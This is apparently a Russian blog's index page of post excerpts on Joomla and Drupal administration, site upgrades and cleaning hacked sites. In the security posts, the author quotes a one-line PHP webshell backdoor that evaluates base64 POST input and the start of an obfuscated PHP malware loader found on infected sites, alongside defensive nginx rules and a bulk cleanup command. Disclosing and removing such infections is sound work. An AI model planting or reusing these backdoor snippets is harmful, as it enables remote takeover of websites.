yandex

Сезонный мандраж в выборе очередной платформы для блога

В предверии выхода Drupal 8 (ну, он ж скоро выйдет )) У меня начался приступ оптимизации того, в чем я веду свои публикации в интернете. Если посмотреть приблизительную хронологию, то получится что-то типа Joostina -> Joomla 1.5.x -> … -> Drupal 6 -> Drupal 7 До момента перехода на Drupal все мои перемещения с движка…

Блокировка доступа к админкам сайтов для nginx и apache

С пятницы по рунету прокатилась волна брутфорса. Довольно большой ботнет подбирал пароли для доступа в административную часть таких движков как Wordpress и Joomla. Для ограничения доступа можно выполнить следующие варианты конфигурирования веб-серверов Для nginx: location ~* ^/(administrator/|wp-admin|wp-login\.php) { allow <ip>; deny all; proxy_pass http://localhist:8080; proxy_redirect http://localhost:8080/ /; proxy_set_header Host $host; proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for; proxy_set_header X-Real-IP…

Уязвимость Joomla с редактором JCE

В плагине редакторе JCE версии ниже 2.0.11 была обнаружена уязвимость и имеет место быть большая череда взломов с последующим внедрением вредоносного кода в js-файлы.Тот случай, который был виден мной, состоял из следующего кода:document.write(”);Можно попробовать выполнить следующую команду в корне директории сайта, однако она несколько грубоватаяfind ./ -type f -name “*.js” -exec perl -pi -e ‘s/docume.*\)\;//g”’…

Вирусы на сайте #3

Продолжаем бесконечную историю. Сегодня день начался с того, что блог перестал открываться по причине того, что хостер убрал InnoDB из поддерживаемых движков сервера баз данных MySQL. Пришлось слить дамп, выполнить команду sed ‘s/InnoDB/MyISAM/g’ old.sql > new.sql и залить обратно =) Сегодня наткнулся на такую прелесть: <?php $md5 = “abe69649a7dbde93d328df6049b55aea”; $wp_salt = array(‘(‘,’t’,’v’,’d’,”i”,”o”,”;”,”b”,’4′,’n’,”a”,”z”,’)’,”c”,”f”,”6″,”r”,”g”,”l”,”e”,”$”,’_’,’s’); $wp_add_filter = create_function(‘$’.’v’,$wp_salt[19].$wp_salt[2].$…

Плагин поиска по mediawiki 1.18.x для Joomla! 2.5

Плагин написан в замен MediaWiki Search, чья версия подходит только для использования с Joomla! 1.5.x. Автор – фрилансер с joomlaforum.ru 😉 Превосходно работает с mediawiki 1.18.x и Joomla 1.7.x. Надеюсь, будет работать и с 2.5.х веткой Joomla.  

Добавить социальные кнопки в Kunena 1.7.x

Вспомнилось, что все хотел добавить на форум возможность делиться с друзьями ссылками на темы посредством социальных сервисов и сетей. В репозитарии расширний Kunena даже был найден плагин, но каково было мое огорчение, когда он оказался платным. В качестве основы я взял блок “Поделиться” от Яндекса. Решено было добавить кнопки с поле заголовка темы. Находим в…

Взлом Joomla, внедрение бекдора и очистка от кода

UPD 01.03.2013: Я закрыл возможность комментирования данной записи. Все вопросы по данной теме задавайте на https://ask.sabini.ch. Благодарю за понимание. В конце 2011 года в Joomla была некая уязвимость, которая позволила злоумышленникам положить в директорию images бекдор – файл post.php, следующего содержания <?php eval(base64_decode($_POST[“php”])); ?> После чего основная масса файлов с расширением php (причем, заражалось все…

Обновление Joomla 1.6 до Joomla 1.7

Раздел статьи “Быстрое обновление” подходит только для сайтов, которые уже обновлены до Joomla 1.6.5., если версия движка вашего сайта не 1.6.5, то рассмотрите варианты, которые представлены ниже: Обновление с помощью Менеджера расширений Для сайта на 1.6, но не на 1.6.5 Обновление до 1.6.5 вручную Миграция с Joomla 1.5 на Joomla_1.6+ Быстрое обновление Для сайтов, работающих на…

ку-ку

Собственно, не осилил с ходу обновление с Drupal 6 на Drupal 7. Слишком много не совсем случайных факторов 😉 Плюс сложности с пониманием Postgresql, на котором у меня крутился Drupal 6. Но о своем бесценном опыте я напишу в ближайшее время. Я практически все записал 😉 ..вот как только перенесу контент. PS: Тут еще и…